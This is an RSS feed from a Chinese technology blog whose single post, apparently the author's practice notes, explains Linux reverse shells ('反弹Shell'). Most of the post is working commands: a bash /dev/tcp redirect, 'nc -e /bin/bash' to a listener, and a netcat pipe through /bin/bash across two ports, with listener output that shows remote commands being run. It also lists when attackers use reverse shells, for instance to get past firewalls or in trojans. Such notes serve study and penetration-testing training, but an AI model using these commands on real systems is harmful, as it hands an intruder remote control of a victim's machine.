<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[向东博客 专注WEB应用 构架之美 --- 构架之美，在于尽态极妍 | 应用之美，在于药到病除]]></title> 
<link>http://jackxiang.com/index.php</link> 
<description><![CDATA[赢在IT，Playin' with IT,Focus on Killer Application,Marketing Meets Technology.]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[向东博客 专注WEB应用 构架之美 --- 构架之美，在于尽态极妍 | 应用之美，在于药到病除]]></copyright>
<item>
<link>http://jackxiang.com/post//</link>
<title><![CDATA[Linux渗透之反弹Shell ]]></title> 
<author>jack &lt;xdy108@126.com&gt;</author>
<category><![CDATA[Unix/LinuxC技术]]></category>
<pubDate>Sat, 24 Jun 2017 04:41:01 +0000</pubDate> 
<guid>http://jackxiang.com/post//</guid> 
<description>
<![CDATA[ 
	ls /proc/8145/fd&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#0,1给定和到socket里面了<br/>https://help.aliyun.com/document_detail/206139.htm<br/><br/>xiangdong@kali-linux-bj-yz-10-10-0-136:~$ <br/>nc -lvvp 6767<br/><br/>[root@levoo-gateway_virtualrouter-ipforward_bj_rfls_10_10_0_3:/tmp]<br/>bash -i &gt;&amp; /dev/tcp/10.10.0.136/6767 0&gt;&amp;1<br/><br/>来自：<a href="https://blog.csdn.net/weixin_50464560/article/details/123886779" target="_blank">https://blog.csdn.net/weixin_50464560/article/details/123886779</a><br/><br/><br/>反弹shell通常适用于如下几种情况：<br/><br/>目标机因防火墙受限，目标机器只能发送请求，不能接收请求。<br/>目标机端口被占用。<br/>目标机位于局域网，或IP会动态变化，攻击机无法直接连接。<br/>对于病毒，木马，受害者什么时候能中招，对方的网络环境是什么样的，什么时候开关机，都是未知的。<br/>......<br/>对于以上几种情况，我们是无法利用正向连接的，要用反向连接。<br/>背景：反弹是目标机主动连接攻击机，是指在控制的机器上开一个端口，在另一端被入侵的服务器上面开一个连接到公网服务器的IP和端口。<br/>如，被控机上运行（相当于在一台生产服务器上面访问一个websocket不断开）：<br/>nc -e /bin/bash 10.10.0.136 4444 <br/><br/>在控制机上面开端口，并能反过来控制那台发起连接的服务器，靠的是它上面的bash解析器：<br/>nc -lp 4444<br/>ls<br/>anaconda-ks.cfg<br/>pwd<br/>/root<br/>ls<br/>anaconda-ks.cfg<br/>cd /home/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br/>ls<br/>10.10.0.1** #/home目录<br/><br/><br/>按顺序开三个SecureCRT终端，在一里面输入echo &quot;hello jackX&quot;,会在二里面显示hello jackX：<br/>一、<br/>nc -l -p 1234 -vv<br/>echo &quot;hello jackX&quot;<br/><br/>二、<br/>nc -l -p 4321 -vv<br/>hello jackX<br/><br/>三、<br/>nc 10.44.202.177 1234&#124;/bin/bash&#124;nc 10.44.202.177 4321<br/>nc 123.57.252.183 1234&#124;/bin/bash&#124;nc 123.57.252.183 4321<br/><br/><br/><br/>这时我们就可以在1234端口输入命令，在4321端口查看命令的输出了。<br/><br/>管道“&#124;”可以将上一个命令的输出作为下一个命令的输入。所以上面命令的意思就是将10.42.0.1:1234传过来的命令交给/bin/bash执行，再将执行结果传给10.44.202.177:4321显示。<br/><br/><br/><br/>nc -l -p 4321 -vv<br/>nc -l -p 4321 -vv<br/>Ncat: Version 6.40 ( http://nmap.org/ncat )<br/>Ncat: Listening on :::4321<br/>Ncat: Listening on 0.0.0.0:4321<br/>Ncat: Connection from 10.44.202.177.<br/>Ncat: Connection from 10.44.202.177:59294.<br/><br/><br/>nc -l -p 1234 -vv<br/>Ncat: Version 6.40 ( http://nmap.org/ncat )<br/>Ncat: Listening on :::1234<br/>Ncat: Listening on 0.0.0.0:1234<br/>Ncat: Connection from 10.44.202.177.<br/>Ncat: Connection from 10.44.202.177:51650.<br/><br/><br/>nc 10.44.202.177 1234&#124;/bin/bash&#124;nc 10.44.202.177 4321<br/>触发上面两个。<br/><br/>摘自实践自：【【安全客】Linux渗透之反弹Shell】http://m.toutiao.com/group/6398009141268365570/?iid=7737129548&amp;app=news_article&amp;tt_from=copy_link&amp;utm_source=copy_link&amp;utm_medium=toutiao_ios&amp;utm_campaign=client_share
]]>
</description>
</item><item>
<link>http://jackxiang.com/post//#blogcomment</link>
<title><![CDATA[[评论] Linux渗透之反弹Shell ]]></title> 
<author> &lt;user@domain.com&gt;</author>
<category><![CDATA[评论]]></category>
<pubDate>Thu, 01 Jan 1970 00:00:00 +0000</pubDate> 
<guid>http://jackxiang.com/post//#blogcomment</guid> 
<description>
<![CDATA[ 
	
]]>
</description>
</item>
</channel>
</rss>